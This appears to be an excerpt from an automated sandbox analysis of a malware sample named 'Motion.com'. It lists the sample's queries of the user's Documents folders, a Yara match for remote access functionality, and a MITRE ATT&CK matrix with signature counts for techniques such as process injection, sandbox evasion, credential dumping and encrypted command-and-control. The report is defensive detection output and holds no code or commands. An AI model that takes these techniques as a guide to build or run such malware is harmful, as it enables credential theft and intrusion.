    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com Directory queried: C:\Users\user\Documents
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com Directory queried: C:\Users\user\Documents\AFWAAFRXKO
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com Directory queried: C:\Users\user\Documents\DTBZGIOOSO
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com Directory queried: C:\Users\user\Documents\DVWHKMNFNN
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com Directory queried: C:\Users\user\Documents\MNULNCRIYC
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com Directory queried: C:\Users\user\Documents\NWTVCDUMOB
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com Directory queried: C:\Users\user\Documents\RAYHIWGKDI
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com Directory queried: C:\Users\user\Documents\TQDGENUHWP
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com Directory queried: C:\Users\user\Documents\XZXHAVGRAG
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com Directory queried: number of queries: 1001

    Remote Access Functionality

    Source: Yara match, File source: sslproxydump.pcap, type: PCAP
    MITRE ATT&CK matrix (number before a technique = count of matching signatures):

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
    Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
    Execution: 121 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd
    Persistence: 1 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
    Privilege Escalation: 12 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
    Defense Evasion: 11 Masquerading; 22 Virtualization/Sandbox Evasion; 12 Process Injection; 1 DLL Side-Loading; Software Packing
    Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
    Discovery: 231 Security Software Discovery; 22 Virtualization/Sandbox Evasion; 3 Process Discovery; 22 File and Directory Discovery; 24 System Information Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
    Collection: 1 Archive Collected Data; 31 Data from Local System; 1 Clipboard Data; Input Capture; Keylogging
    Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
    Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact